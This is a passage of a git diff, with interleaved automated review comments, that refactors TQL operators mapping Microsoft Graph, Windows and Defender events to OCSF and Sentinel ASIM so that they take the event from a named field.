microsoft/tests/ocsf/eid-0129.txt | 2 + microsoft/tests/ocsf/eid-0140.tql | 7 ++- microsoft/tests/ocsf/eid-0140.txt | 2 + microsoft/tests/ocsf/eid-0141.tql | 7 ++- microsoft/tests/ocsf/eid-0141.txt | 2 + microsoft/tests/ocsf/eid-0200.tql | 7 ++- microsoft/tests/ocsf/eid-0200.txt | 2 + microsoft/tests/ocsf/eid-0201.tql | 7 ++- microsoft/tests/ocsf/eid-0201.txt | 2 + microsoft/tests/ocsf/eid-1000.tql | 7 ++- 
microsoft/tests/ocsf/eid-1000.txt | 2 + microsoft/tests/ocsf/eid-1001.tql | 7 ++- microsoft/tests/ocsf/eid-1001.txt | 2 + microsoft/tests/ocsf/eid-1002.tql | 7 ++- microsoft/tests/ocsf/eid-1002.txt | 2 + microsoft/tests/ocsf/eid-1006.tql | 7 ++- microsoft/tests/ocsf/eid-1006.txt | 2 + microsoft/tests/ocsf/eid-1007.tql | 7 ++- microsoft/tests/ocsf/eid-1007.txt | 2 + microsoft/tests/ocsf/eid-1102.tql | 7 ++- microsoft/tests/ocsf/eid-1102.txt | 2 + microsoft/tests/ocsf/eid-1116.tql | 7 ++- microsoft/tests/ocsf/eid-1116.txt | 2 + microsoft/tests/ocsf/eid-1117.tql | 7 ++- microsoft/tests/ocsf/eid-1117.txt | 2 + microsoft/tests/ocsf/eid-1121.tql | 7 ++- microsoft/tests/ocsf/eid-1121.txt | 2 + microsoft/tests/ocsf/eid-2000.tql | 7 ++- microsoft/tests/ocsf/eid-2000.txt | 2 + microsoft/tests/ocsf/eid-4100.tql | 7 ++- microsoft/tests/ocsf/eid-4100.txt | 2 + microsoft/tests/ocsf/eid-4103.tql | 7 ++- microsoft/tests/ocsf/eid-4103.txt | 2 + microsoft/tests/ocsf/eid-4104.tql | 7 ++- microsoft/tests/ocsf/eid-4104.txt | 2 + microsoft/tests/ocsf/eid-4105.tql | 7 ++- microsoft/tests/ocsf/eid-4105.txt | 2 + microsoft/tests/ocsf/eid-4106.tql | 7 ++- microsoft/tests/ocsf/eid-4106.txt | 2 + microsoft/tests/ocsf/eid-4624.tql | 7 ++- microsoft/tests/ocsf/eid-4624.txt | 2 + microsoft/tests/ocsf/eid-4625.tql | 7 ++- microsoft/tests/ocsf/eid-4625.txt | 2 + microsoft/tests/ocsf/eid-4648.tql | 7 ++- microsoft/tests/ocsf/eid-4648.txt | 2 + microsoft/tests/ocsf/eid-4672.tql | 7 ++- microsoft/tests/ocsf/eid-4672.txt | 2 + microsoft/tests/ocsf/eid-4688.tql | 7 ++- microsoft/tests/ocsf/eid-4688.txt | 2 + microsoft/tests/ocsf/eid-4697.tql | 7 ++- microsoft/tests/ocsf/eid-4697.txt | 2 + microsoft/tests/ocsf/eid-4698.tql | 7 ++- microsoft/tests/ocsf/eid-4698.txt | 2 + microsoft/tests/ocsf/eid-4720.tql | 7 ++- microsoft/tests/ocsf/eid-4720.txt | 2 + microsoft/tests/ocsf/eid-4722.tql | 7 ++- microsoft/tests/ocsf/eid-4722.txt | 2 + microsoft/tests/ocsf/eid-4725.tql | 7 ++- 
microsoft/tests/ocsf/eid-4725.txt | 2 + microsoft/tests/ocsf/eid-4726.tql | 7 ++- microsoft/tests/ocsf/eid-4726.txt | 2 + microsoft/tests/ocsf/eid-4728.tql | 7 ++- microsoft/tests/ocsf/eid-4728.txt | 2 + microsoft/tests/ocsf/eid-4730.tql | 7 ++- microsoft/tests/ocsf/eid-4730.txt | 2 + microsoft/tests/ocsf/eid-4732.tql | 7 ++- microsoft/tests/ocsf/eid-4732.txt | 2 + microsoft/tests/ocsf/eid-4769.tql | 7 ++- microsoft/tests/ocsf/eid-4769.txt | 2 + microsoft/tests/ocsf/eid-4771.tql | 7 ++- microsoft/tests/ocsf/eid-4771.txt | 2 + microsoft/tests/ocsf/eid-4776.tql | 7 ++- microsoft/tests/ocsf/eid-4776.txt | 2 + microsoft/tests/ocsf/eid-5001.tql | 7 ++- microsoft/tests/ocsf/eid-5001.txt | 2 + microsoft/tests/ocsf/eid-5007.tql | 7 ++- microsoft/tests/ocsf/eid-5007.txt | 2 + microsoft/tests/ocsf/eid-6005.tql | 7 ++- microsoft/tests/ocsf/eid-6005.txt | 2 + microsoft/tests/ocsf/eid-6006.tql | 7 ++- microsoft/tests/ocsf/eid-6006.txt | 2 + microsoft/tests/ocsf/eid-7034.tql | 7 ++- microsoft/tests/ocsf/eid-7034.txt | 2 + microsoft/tests/ocsf/eid-7045.tql | 7 ++- microsoft/tests/ocsf/eid-7045.txt | 2 + microsoft/tests/ocsf/eid-9999.tql | 7 ++- microsoft/tests/ocsf/eid-9999.txt | 2 + 152 files changed, 666 insertions(+), 195 deletions(-) diff --git a/microsoft/examples/graph-defender-alerts-to-ocsf.tql b/microsoft/examples/graph-defender-alerts-to-ocsf.tql index ae2bd8f..5432695 100644 --- a/microsoft/examples/graph-defender-alerts-to-ocsf.tql +++ b/microsoft/examples/graph-defender-alerts-to-ocsf.tql @@ -8,6 +8,8 @@ microsoft::graph::defender::alerts \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-defender-incidents-to-ocsf.tql b/microsoft/examples/graph-defender-incidents-to-ocsf.tql index 862f44c..f7d5ccd 100644 --- a/microsoft/examples/graph-defender-incidents-to-ocsf.tql 
+++ b/microsoft/examples/graph-defender-incidents-to-ocsf.tql @@ -9,7 +9,9 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-directory-audits-to-ocsf.tql b/microsoft/examples/graph-directory-audits-to-ocsf.tql index cf3498e..6cbec07 100644 --- a/microsoft/examples/graph-directory-audits-to-ocsf.tql +++ b/microsoft/examples/graph-directory-audits-to-ocsf.tql @@ -9,7 +9,9 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-compliance-to-ocsf.tql b/microsoft/examples/graph-intune-compliance-to-ocsf.tql index de4b6b2..a5f4567 100644 --- a/microsoft/examples/graph-intune-compliance-to-ocsf.tql +++ b/microsoft/examples/graph-intune-compliance-to-ocsf.tql @@ -8,7 +8,9 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql index 3277563..20d3bc1 100644 --- a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql +++ b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql @@ -8,7 +8,9 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql index 4e0ef7f..b19b182 100644 --- a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql 
+++ b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql @@ -7,6 +7,8 @@ microsoft::graph::intune::managed_devices \ tenant_id="TENANT_ID", client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-risk-detections-to-ocsf.tql b/microsoft/examples/graph-risk-detections-to-ocsf.tql index 5b59ea1..191cac5 100644 --- a/microsoft/examples/graph-risk-detections-to-ocsf.tql +++ b/microsoft/examples/graph-risk-detections-to-ocsf.tql @@ -8,7 +8,9 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-risky-users-to-ocsf.tql b/microsoft/examples/graph-risky-users-to-ocsf.tql index 1c37ffd..e0584d5 100644 --- a/microsoft/examples/graph-risky-users-to-ocsf.tql +++ b/microsoft/examples/graph-risky-users-to-ocsf.tql @@ -8,7 +8,9 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-sign-ins-to-ocsf.tql b/microsoft/examples/graph-sign-ins-to-ocsf.tql index 7a1031a..96f5a04 100644 --- a/microsoft/examples/graph-sign-ins-to-ocsf.tql +++ b/microsoft/examples/graph-sign-ins-to-ocsf.tql @@ -8,6 +8,8 @@ microsoft::graph::sign_ins \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/examples/windows-event-log-to-ocsf.tql b/microsoft/examples/windows-event-log-to-ocsf.tql index 7970b53..a25f54b 100644 --- a/microsoft/examples/windows-event-log-to-ocsf.tql +++ b/microsoft/examples/windows-event-log-to-ocsf.tql 
@@ -6,7 +6,10 @@ description: Parse Windows Event Log XML and map the structured event to OCSF.
 from_file "windows-event.xml" {
 read_all
 }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql
index 9b4de4f..6a6e56c 100644
--- a/microsoft/operators/asim/map.tql
+++ b/microsoft/operators/asim/map.tql
@@ -1,11 +1,22 @@
 ---
 description: Maps supported Microsoft events to Microsoft Sentinel ASIM.
+args:
+ named:
+ - name: event
+ description: The field that holds the Microsoft event to map.
+ type: field
 ---
-if class_uid? == null {
- microsoft::ocsf::map
+if $event.class_uid? == null {
+ microsoft::ocsf::map event=$event
+ _microsoft_outer = this
+ _microsoft_event = $event
+ this = _microsoft_event
 ocsf::derive
 ocsf::cast
+ _microsoft_outer._microsoft_event = this
+ this = _microsoft_outer
+ $event = move _microsoft_event
 }
-microsoft::asim::ocsf::map
+microsoft::asim::ocsf::map event=$event
diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql
index 0ac7957..5d3bda3 100644
--- a/microsoft/operators/asim/ocsf/account_change.tql
+++ b/microsoft/operators/asim/ocsf/account_change.tql
@@ -1,8 +1,15 @@
 ---
 description: Maps OCSF Account Change events to Microsoft Sentinel ASIM UserManagement events.
+args:
+ named:
+ - name: event
+ description: The field that holds the OCSF event to map.
+ type: field
 ---
-assert class_uid == 3001
+assert $event.class_uid == 3001
+
+ocsf = $event
 microsoft::asim::ocsf::helpers::common
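Review bot: The `_microsoft_outer = this` save in `microsoft/operators/asim/map.tql` looks like it is lost two lines later, because `this = _microsoft_event` replaces the whole record, including the `_microsoft_outer` field, before `ocsf::derive` runs; afterwards `_microsoft_outer._microsoft_event = this` creates a fresh `_microsoft_outer` holding only the cast event, so `this = _microsoft_outer` followed by `$event = move _microsoft_event` appears to yield a record that contains just `$event` and none of the caller's sibling fields. If assignments to `this` behave that way, the composability this commit aims for is silently lost on the `class_uid? == null` path, and the `event = this … this = event` callers in the tests and examples would not notice. A test that places a sibling field next to `event` before `microsoft::asim::map event=event` and asserts it survives would settle it, and since `_microsoft_outer`/`_microsoft_event` also collide with any input record that already carries those names, the `if` block deserves a comment such as `// Scratch fields: derive/cast only operate on this, so the event is swapped in and back out.`.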
@@ -44,4 +51,5 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 599e62c..48e7b06 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Authentication events to Microsoft Sentinel ASIM Authentication events. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3002 +assert $event.class_uid == 3002 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -57,4 +64,5 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 7979689..1597761 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Authorize Session events to Microsoft Sentinel ASIM Authentication events. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3003 +assert $event.class_uid == 3003 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -54,4 +61,5 @@ if ocsf.auth_factors? != null { asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim 
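Review bot: `ocsf = $event` in the first hunk together with `drop ocsf, asim` here clobbers and then deletes any caller field named `ocsf` or `asim`, and if a caller can pass `event=ocsf`, the mapped result written by `$event = {...asim, AdditionalFields: ocsf}` is itself removed by the `drop` on the next line, because `$event` and the scratch field are then the same path. The same two-hunk pattern is repeated in the authentication, authorize_session, compliance_finding, detection_finding, dhcp_activity, dns_activity, entity_management, event_log_activity, file_system_activity, group_management, http_activity, network_activity, and process_activity hunks of this patch. Given the commit's stated goal of composability with surrounding records, a reserved prefix for the two scratch fields, matching the `_microsoft_` convention this patch already uses in `asim/map.tql`, plus one test with a sibling field beside `event` would close the gap; the rename also touches the helper's `ocsf.`/`asim.` references that lie outside these hunks.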
diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 6e2ebd2..efc0a01 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM AlertEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 2003 +assert $event.class_uid == 2003 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -39,4 +46,5 @@ match ocsf.verdict? { _ => {} } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index fd6a6f2..510424b 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM AlertEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 2004 +assert $event.class_uid == 2004 + +ocsf = $event let $threat_categories = { adware: "Adware", @@ -54,4 +61,5 @@ match ocsf.verdict? { _ => {} } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 7b3e052..9973929 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql 
@@ -1,8 +1,15 @@ --- description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 4004 +assert $event.class_uid == 4004 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -19,4 +26,5 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.stri asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index dff6438..1f0b6e9 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 4003 +assert $event.class_uid == 4003 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -24,4 +31,5 @@ asim.SrcHostname = ocsf.src_endpoint?.hostname? asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 4596c6a..de663a9 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql 
@@ -1,8 +1,15 @@ --- description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM AuditEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3004 +assert $event.class_uid == 3004 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -38,4 +45,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index a18038f..eda9813 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM AuditEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 1008 +assert $event.class_uid == 1008 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -38,4 +45,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 8ce30a7..37cf962 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql 
@@ -1,8 +1,15 @@ --- description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM FileEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 1001 +assert $event.class_uid == 1001 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -34,4 +41,5 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { } asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 78da3a0..2437da8 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserManagement events. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 3006 +assert $event.class_uid == 3006 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -40,4 +47,5 @@ asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/helpers/common.tql b/microsoft/operators/asim/ocsf/helpers/common.tql index 01cb285..bc61f84 100644 --- a/microsoft/operators/asim/ocsf/helpers/common.tql +++ b/microsoft/operators/asim/ocsf/helpers/common.tql @@ -2,7 +2,7 @@ description: Initializes shared ASIM fields from a validated OCSF event. --- -this = {ocsf: this, asim: {}} +asim = {} asim.EventCount = 1 asim.EventStartTime = ocsf.start_time? else ocsf.time 
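Review bot: `asim = {}` in `helpers/common.tql` leaves the helper with an implicit contract that the removed `this = {ocsf: this, asim: {}}` made explicit: it reads a top-level `ocsf` field the caller must have set beforehand (`ocsf = $event` in each class mapper) and writes a top-level `asim` record the caller must later fold into `$event` and drop, yet the description still reads as if the helper consumed the event itself. Rewording it to something like `description: Initializes the top-level asim record from the caller's top-level ocsf field; callers set ocsf beforehand and drop both afterwards.` would document the dependency where the next mapper author will look. The description line itself sits outside this hunk's changed lines.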
diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 9c06324..92f6e13 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSession records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 4002 +assert $event.class_uid == 4002 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -17,4 +24,5 @@ if ocsf.http_response?.code? != null { asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index f9025c4..2fda544 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql 
@@ -1,63 +1,68 @@ --- description: Maps validated OCSF 1.8 events to Microsoft Sentinel ASIM. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -match class_uid { +match $event.class_uid { 2003 => { - microsoft::asim::ocsf::compliance_finding + microsoft::asim::ocsf::compliance_finding event=$event } 2004 => { - microsoft::asim::ocsf::detection_finding + microsoft::asim::ocsf::detection_finding event=$event } 1006 => { - microsoft::asim::ocsf::scheduled_job_activity + microsoft::asim::ocsf::scheduled_job_activity event=$event } 1008 => { - microsoft::asim::ocsf::event_log_activity + microsoft::asim::ocsf::event_log_activity event=$event } 3004 => { - microsoft::asim::ocsf::entity_management + microsoft::asim::ocsf::entity_management event=$event } 201004 => { - microsoft::asim::ocsf::windows_service_activity + microsoft::asim::ocsf::windows_service_activity event=$event } 3002 => { - microsoft::asim::ocsf::authentication + microsoft::asim::ocsf::authentication event=$event } 3003 => { - microsoft::asim::ocsf::authorize_session + microsoft::asim::ocsf::authorize_session event=$event } 3001 => { - microsoft::asim::ocsf::account_change + microsoft::asim::ocsf::account_change event=$event } 3006 => { - microsoft::asim::ocsf::group_management + microsoft::asim::ocsf::group_management event=$event } 1007 => { - microsoft::asim::ocsf::process_activity + microsoft::asim::ocsf::process_activity event=$event } 1001 => { - microsoft::asim::ocsf::file_system_activity + microsoft::asim::ocsf::file_system_activity event=$event } 4001 => { - microsoft::asim::ocsf::network_activity + microsoft::asim::ocsf::network_activity event=$event } 4002 => { - microsoft::asim::ocsf::http_activity + microsoft::asim::ocsf::http_activity event=$event } 4003 => { - microsoft::asim::ocsf::dns_activity + microsoft::asim::ocsf::dns_activity event=$event } 4004 => { - microsoft::asim::ocsf::dhcp_activity + 
microsoft::asim::ocsf::dhcp_activity event=$event } _ => { assert false, message={ reason: "unsupported OCSF to ASIM mapping", - class_uid: class_uid?, - class_name: class_name?, - type_uid: type_uid?, - type_name: type_name?, + class_uid: $event.class_uid?, + class_name: $event.class_name?, + type_uid: $event.type_uid?, + type_name: $event.type_name?, name: @name, } } diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index ce8042a..70b9a6b 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Network Activity events to Microsoft Sentinel ASIM NetworkSession records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 4001 +assert $event.class_uid == 4001 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -32,4 +39,5 @@ match ocsf.disposition? { _ => {} } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index ee0c83a..0d94a2c 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM ProcessEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 1007 +assert $event.class_uid == 1007 + +ocsf = $event microsoft::asim::ocsf::helpers::common 
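Review bot: The new `args` description says only which field holds the OCSF event, but every branch rewrites that field in place (the per-class operators assign `$event = {...asim, AdditionalFields: ocsf}`), and the `_` branch fails an `assert`, which outside `strict` presumably drops the event with a warning rather than passing it through, as the strict test for `ocsf.script_activity` relies on. A reader of the operator signature cannot see either effect. Suggest `description: The field that holds the OCSF event to map. It is replaced in place with the ASIM record; events with an unsupported class_uid fail the assertion in the catch-all branch.` The same wording gap exists in the args blocks of the per-class operators.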
@@ -28,4 +35,5 @@ asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 306a042..1444363 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM AuditEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 1006 +assert $event.class_uid == 1006 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -38,4 +45,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 2d52a32..ae5e1b5 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASIM AuditEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 201004 +assert $event.class_uid == 201004 + +ocsf = $event microsoft::asim::ocsf::helpers::common 
@@ -38,4 +45,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index b8506f5..1489dc1 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -1,8 +1,14 @@ --- description: Microsoft Graph → OCSF +args: + named: + - name: event + description: The field that holds the Microsoft Graph event to map. + type: field --- -this = {graph: this, ocsf: {}} +graph = $event +ocsf = {} ocsf.cloud = { provider: "Azure", @@ -63,4 +69,5 @@ match @name { } } -this = {...ocsf, unmapped: graph} +$event = {...ocsf, unmapped: graph} +drop graph, ocsf diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql index 5208749..bf71cc6 100644 --- a/microsoft/operators/ocsf/map.tql +++ b/microsoft/operators/ocsf/map.tql @@ -1,9 +1,14 @@ --- description: Maps 